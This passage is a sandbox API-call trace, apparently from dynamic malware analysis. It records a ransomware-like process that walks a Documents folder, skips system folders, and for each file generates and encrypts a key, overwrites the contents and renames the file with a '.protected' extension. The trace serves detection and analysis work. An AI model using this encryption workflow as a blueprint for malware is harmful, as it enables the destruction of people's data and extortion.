lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.382] CloseHandle (hObject=0xd4) returned 1 [0091.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx.protected") returned 78 [0091.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\j2md7selwotzt.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\J2Md7SeLwOtzt.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\j2md7selwotzt.pptx.protected")) returned 1 [0091.383] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="Windows") returned -1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="Program Files") returned -1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="Program Files (x86)") returned -1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="$Recycle.bin") returned 1 [0091.383] lstrcmpiW (lpString1="jGG-XtEiWWZRu.ods", lpString2="System Volume Information") returned -1 [0091.383] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods") returned 67 [0091.383] StrStrIW (lpFirst="jGG-XtEiWWZRu.ods", lpSrch=".protected") returned 0x0 [0091.383] lstrcmpW (lpString1="jGG-XtEiWWZRu.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.383] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.383] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\jgg-xteiwwzru.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods") returned 67 [0091.384] StrStrW (lpFirst="jGG-XtEiWWZRu.ods", lpSrch=".txt") returned 0x0 [0091.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods") returned 67 [0091.384] StrStrW (lpFirst="jGG-XtEiWWZRu.ods", lpSrch=".rar") returned 0x0 [0091.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods") returned 67 [0091.384] StrStrW (lpFirst="jGG-XtEiWWZRu.ods", lpSrch=".zip") returned 0x0 [0091.384] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.385] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.385] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.385] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.385] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.385] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.385] CloseHandle (hObject=0xd4) returned 1 [0091.386] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods.protected") returned 77 [0091.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\jgg-xteiwwzru.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\jGG-XtEiWWZRu.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\jgg-xteiwwzru.ods.protected")) returned 1 [0091.387] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="Windows") returned -1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="Program Files") returned -1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="Program Files (x86)") returned -1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="$Recycle.bin") returned 1 [0091.387] lstrcmpiW (lpString1="K8LjWYb.ods", lpString2="System Volume Information") returned -1 [0091.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods") returned 61 [0091.387] StrStrIW (lpFirst="K8LjWYb.ods", lpSrch=".protected") returned 0x0 [0091.387] lstrcmpW (lpString1="K8LjWYb.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.387] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.387] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\k8ljwyb.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.388] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods") returned 61 [0091.388] StrStrW (lpFirst="K8LjWYb.ods", lpSrch=".txt") returned 0x0 [0091.388] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods") returned 61 [0091.388] StrStrW (lpFirst="K8LjWYb.ods", lpSrch=".rar") returned 0x0 [0091.388] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods") returned 61 [0091.388] StrStrW (lpFirst="K8LjWYb.ods", lpSrch=".zip") returned 0x0 [0091.388] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.388] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.388] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.389] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.389] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.389] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.389] CloseHandle (hObject=0xd4) returned 1 [0091.390] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods.protected") returned 71 [0091.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\k8ljwyb.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\K8LjWYb.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\k8ljwyb.ods.protected")) returned 1 [0091.393] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="Windows") returned -1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="Program Files") returned -1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="Program Files (x86)") returned -1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="$Recycle.bin") returned 1 [0091.393] lstrcmpiW (lpString1="PhR9uIlYXrr8.docx", lpString2="System Volume Information") returned -1 [0091.393] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx") returned 67 [0091.393] StrStrIW (lpFirst="PhR9uIlYXrr8.docx", lpSrch=".protected") returned 0x0 [0091.393] lstrcmpW (lpString1="PhR9uIlYXrr8.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\phr9uilyxrr8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx") returned 67 [0091.394] StrStrW (lpFirst="PhR9uIlYXrr8.docx", lpSrch=".txt") returned 0x0 [0091.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx") returned 67 [0091.394] StrStrW (lpFirst="PhR9uIlYXrr8.docx", lpSrch=".rar") returned 0x0 [0091.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx") returned 67 [0091.394] StrStrW (lpFirst="PhR9uIlYXrr8.docx", lpSrch=".zip") returned 0x0 [0091.394] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.395] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.395] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.395] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.395] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.395] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.395] CloseHandle (hObject=0xd4) returned 1 [0091.396] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx.protected") returned 77 [0091.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\phr9uilyxrr8.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\PhR9uIlYXrr8.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\phr9uilyxrr8.docx.protected")) returned 1 [0091.397] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="Windows") returned -1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="Program Files") returned 1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="Program Files (x86)") returned 1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="$Recycle.bin") returned 1 [0091.397] lstrcmpiW (lpString1="Ps6KhxYxI.odp", lpString2="System Volume Information") returned -1 [0091.397] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp") returned 63 [0091.397] StrStrIW (lpFirst="Ps6KhxYxI.odp", lpSrch=".protected") returned 0x0 [0091.397] lstrcmpW (lpString1="Ps6KhxYxI.odp", lpString2="RESTORE_FILES.txt") returned -1 [0091.397] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ps6khxyxi.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp") returned 63 [0091.397] StrStrW (lpFirst="Ps6KhxYxI.odp", lpSrch=".txt") returned 0x0 [0091.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp") returned 63 [0091.397] StrStrW (lpFirst="Ps6KhxYxI.odp", lpSrch=".rar") returned 0x0 [0091.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp") returned 63 [0091.397] StrStrW (lpFirst="Ps6KhxYxI.odp", lpSrch=".zip") returned 0x0 [0091.397] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.398] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.398] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.399] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.399] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.399] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.399] CloseHandle (hObject=0xd4) returned 1 [0091.399] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp.protected") returned 73 [0091.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ps6khxyxi.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ps6KhxYxI.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ps6khxyxi.odp.protected")) returned 1 [0091.400] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="Windows") returned -1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="Program Files") returned 1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="Program Files (x86)") returned 1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="$Recycle.bin") returned 1 [0091.400] lstrcmpiW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="System Volume Information") returned -1 [0091.400] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx") returned 67 [0091.400] StrStrIW (lpFirst="qt1IqkPEmb_p.xlsx", lpSrch=".protected") returned 0x0 [0091.400] lstrcmpW (lpString1="qt1IqkPEmb_p.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.400] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.401] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\qt1iqkpemb_p.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx") returned 67 [0091.401] StrStrW (lpFirst="qt1IqkPEmb_p.xlsx", lpSrch=".txt") returned 0x0 [0091.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx") returned 67 [0091.401] StrStrW (lpFirst="qt1IqkPEmb_p.xlsx", lpSrch=".rar") returned 0x0 [0091.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx") returned 67 [0091.401] StrStrW (lpFirst="qt1IqkPEmb_p.xlsx", lpSrch=".zip") returned 0x0 [0091.401] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2478, lpOverlapped=0x0) returned 1 [0091.402] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffdb88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.402] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2478, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2478, lpOverlapped=0x0) returned 1 [0091.403] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.403] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.403] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.403] CloseHandle (hObject=0xd4) returned 1 [0091.403] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx.protected") returned 77 [0091.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\qt1iqkpemb_p.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\qt1iqkpemb_p.xlsx.protected")) returned 1 [0091.405] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="Windows") returned -1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="Program Files") returned 1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="Program Files (x86)") returned 1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="$Recycle.bin") returned 1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="System Volume Information") returned -1 [0091.405] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp") returned 66 [0091.405] StrStrIW (lpFirst="S25mweNwZUri.odp", lpSrch=".protected") returned 0x0 [0091.405] lstrcmpW (lpString1="S25mweNwZUri.odp", lpString2="RESTORE_FILES.txt") returned 1 [0091.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\s25mwenwzuri.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp") returned 66 [0091.406] StrStrW (lpFirst="S25mweNwZUri.odp", lpSrch=".txt") returned 0x0 [0091.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp") returned 66 [0091.406] StrStrW (lpFirst="S25mweNwZUri.odp", lpSrch=".rar") returned 0x0 [0091.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp") returned 66 [0091.406] StrStrW (lpFirst="S25mweNwZUri.odp", lpSrch=".zip") returned 0x0 [0091.406] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, 